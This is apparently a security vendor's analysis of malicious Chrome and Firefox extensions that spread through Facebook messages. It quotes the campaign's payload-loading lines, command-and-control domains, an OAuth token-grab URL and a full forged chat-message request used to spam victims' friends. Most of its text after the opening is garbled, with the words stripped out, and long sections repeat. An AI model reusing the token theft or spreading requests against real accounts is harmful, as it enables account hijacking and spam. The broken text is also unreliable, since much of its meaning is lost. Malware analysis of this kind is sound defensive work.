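According to media reports, Facebook dealt with this threat and blocked the spread of the malicious messages. However, we later found many malicious links still spreading, and decided to work out how this attack operates in order to protect Yandex.Browser users.
According to the media, the cause was a malicious Chrome browser extension called YouTurn, which users are prompted to install when they click a link received from an infected friend. However, we found that several extensions were used as part of this infection. Incidentally, YouTurn had already been removed from the Chrome Store on December 16.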

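They were all built in a similar way, but were distributed under different names and at different times through phishing resources that resembled Facebook pages and were hosted on Amazon S3. Interestingly, in addition to the distribution mechanism, they loaded banner ads with questionable content into every browser tab and gave access to the infected user's account to an internal application whose ID Facebook has blocked.
So, was this "virus" really that harmless?
Analysis of the malware distribution scheme
In every case, the malicious link was generated with one of various URL shortening services, and a user who followed it was sent along a chain of server-side redirects, for example: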
goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE=
The final destination was a web page on dropboxusercontent.com. It contained a very simple JS script whose main job was to check the browser's navigator object and perform a redirect depending on its value. Mobile and IE users were redirected to teladea.blogspot.com, which contained a parody of the film Friday the 13th and a link to the Red Cross website.

The script redirected Firefox users to video51828.s3-website-us-west-2.amazonaws.com/mf39.html and Chrome users to video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html, while users with the substring "Facebook-bot" in navigator were redirected to Google.

Landing page code
The web page for Firefox users (video51828.s3-website-us-west-2.amazonaws.com/mf49.html) was disguised as YouTube (the web content was generated mainly via JS). If the user reached this page from an Android-based mobile device, a redirect to the s.html web page was performed, but that page was no longer available at the time of analysis. If the browser was a desktop one, the page showed, in place of the video, a message saying that Flash Player had to be updated in order to view it. The full code can be seen here.

Clicking the "Update player" button installed the "PremiumCodec" browser extension in Firefox, downloaded from premiumd1.mzzhost.com/premiumD.xpi. Interestingly, Firefox requires additional permission to install an extension, but the attackers took this into account: after the click on the player update, additional JS code displayed an image with a pointer showing where to click to allow the installation.
The extension was installed directly when the following code ran:
top["location"] = premiumd1.mzzhost.com/premiumD.xpi
An obfuscated JS script placed directly on the page was responsible for this functionality.

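Fragment of the deobfuscated extension installation code for Firefox
The analysis of the extension is given below, in the corresponding section of the post.
The web page for Chrome users (http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html) was also a phishing page and tried to impersonate Facebook. Its content was likewise generated with JavaScript.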

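The full page code is here.
Clicking the area with the video told the user that no player had been found and suggested installing a special browser extension to make up for this annoying shortcoming. In our case it was the YouTube Now extension (id akmghomonnhljmlfemmifjblglkacfhg), installed from the Chrome Web Store using the chrome.webstore.install JS mechanism.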

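Fragment of the deobfuscated extension installation script

The application's page in the Chrome Web Store
The extension's source was the same Amazon S3 website address from which it was distributed.
Analysis of the Firefox extension
The extension consisted of several files and was built on the Crossbrowser.com platform, but its functionality was very simple. It inserted the script adeaditi.info/kmain.js into every open browser tab by adding a new tag (adeaditi.info/kmain.js) to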
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .
PremiumCodec
adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
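The manifest policy quoted above admits 'unsafe-eval' and a remote host as script sources, the settings an extension needs in order to run code fetched from a server. The following check is an added example, not code from the article or from the extension: it parses a manifest and reports such sources. The sample manifest is constructed (only its content_security_policy string is the one quoted on this page), all function names are assumptions of the example, and it also accepts the Manifest V3 object form, which goes beyond the case shown here.

```javascript
// Added example: report CSP sources in an extension manifest that allow
// remotely hosted or dynamically evaluated code.
// SAMPLE_MANIFEST is constructed; only its content_security_policy string
// is the one quoted in the article.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "YouTube Now",
  version: "1.0",                       // constructed
  permissions: ["contextMenus"],
  background: { scripts: ["main.js"] }, // constructed
  content_security_policy:
    "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'",
});

// Directives that decide where executable content may come from.
const CODE_DIRECTIVES = new Set(["default-src", "script-src", "object-src"]);

// Split a CSP string into a Map: directive name -> list of source expressions.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // When a directive is repeated, the first occurrence is the one that applies.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Manifest V2 stores the policy as a string, Manifest V3 as an object of strings.
function cspStrings(manifest) {
  const csp = manifest.content_security_policy;
  if (typeof csp === "string") return [csp];
  if (csp && typeof csp === "object") {
    return Object.values(csp).filter((v) => typeof v === "string");
  }
  return [];
}

// Classify one source expression; null means it is not reported.
function classifySource(source) {
  const s = source.toLowerCase();
  if (s === "'unsafe-eval'" || s === "'unsafe-inline'") return "unsafe-keyword";
  if (s.startsWith("'")) return null;                          // 'self', 'none', hashes
  if (s === "*" || s.endsWith(":")) return "scheme-or-wildcard"; // *, https:, data:
  return "remote-host";
}

// Reduce a host source such as https://host:443/path to its bare host name.
function hostOf(source) {
  return source
    .toLowerCase()
    .replace(/^[a-z][a-z0-9+.-]*:\/\//, "")
    .split("/")[0]
    .replace(/:(\d+|\*)$/, "");
}

// Return one finding per risky source in a code-bearing directive.
function auditManifest(manifestJson) {
  let manifest;
  try {
    manifest = JSON.parse(manifestJson);
  } catch (e) {
    manifest = null;
  }
  if (manifest === null || typeof manifest !== "object") {
    return [{ kind: "invalid-json", directive: null, source: null }];
  }
  const findings = [];
  for (const policy of cspStrings(manifest)) {
    for (const [directive, sources] of parseCsp(policy)) {
      if (!CODE_DIRECTIVES.has(directive)) continue;
      for (const source of sources) {
        const kind = classifySource(source);
        if (kind) findings.push({ kind, directive, source });
      }
    }
  }
  return findings;
}

// Unique remote hosts the manifest lets the extension load code from.
function remoteCodeHosts(manifestJson) {
  const hosts = auditManifest(manifestJson)
    .filter((f) => f.kind === "remote-host")
    .map((f) => hostOf(f.source));
  return [...new Set(hosts)].sort();
}

for (const f of auditManifest(SAMPLE_MANIFEST)) {
  console.log(`${f.directive}: ${f.source} (${f.kind})`);
}
```

Run over an unpacked extension directory's manifest.json, a non-empty result from remoteCodeHosts is a reason to read the extension's scripts before trusting it.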
main.js
main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.
ld.js
callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .
qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .
URL bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.
20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday
uygulamaizinver()
ajax-, html, , action . duzenlevegonder()
, , , duzenlevegonder()
.
Facebook , , . . .
, facebook.com, , babasker()
, bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .
id
localStorage okanxxxxss2 + 11e4, babasker()
.
, Firefox. , .
, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
head . kmain.js - , . Facebook , , adeaditi.info/kmain.js
- . , Firefox Facebook- .

PremiumCodec

adeaditi.info/kmain.js
Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :
"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'"
,
, CSP https bmw5done.info.
main.js

main.js
, document.write(“https://bmw5done.info/indonesia/ld.js”) .
ld.js, . box, ajax- :
bmw5done.info/qbrweq.js?187630.24409614317
json, uri, cmd. json , , cmd . , .
ld.js localStorage ran_before, , , 1, facebook.com.

ld.js
callback- . , url “devtools://”, , ajax-
bmw5done.info/qbrweq.js?
, chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.
qbrweq.js? , Facebook-, .
, URL “www.facebook.com”, , . ,
uiToggle wrap, uiPopover. _5ce
. , . , , Facebook .

qbrweq.js,
ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .

URL
bmw5done.info/apostime.php
— php- C&C . , , json, : link type. :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax-
www.googleapis.com/urlshortener/v1/url
. localStorage “fb_postlink”. .
ajax-api graph.facebook.com .
facebook.com/ajax/typeahead/place_tag_friends.php
json . json , friends_fields, 20 :
“&composertags_with[19]=<id_ >"
.

20
veri, friends_fields.
, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .
, Like, , . , , .
:
uygulamaizinver(TokenUrl("517220311745087"));
, Facebook- Facebook- id 517220311745087. TokenUrl() url -:
www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday

uygulamaizinver()
ajax-, html, , action .
duzenlevegonder()
, , ,
duzenlevegonder()
.

Facebook , , . . .
, facebook.com, ,
babasker()
,
bmw5done.info/ag.php
. php-, C&C, , API Facebook. json :
{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }
“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , .
qwecek()
, C&C json.
AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json
benimesaj()
, :
message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.
API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .

id
localStorage okanxxxxss2 + 11e4,
babasker()
.
, Firefox. , .

, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .
Chrome, , - :
. ; - , .
, , .. , , - . , , , , - .
, , C&C , , , adeaditi.info
cracks4free.info.
:
support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing
, . , , , 2011 .
, - . Facebook . , .
SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .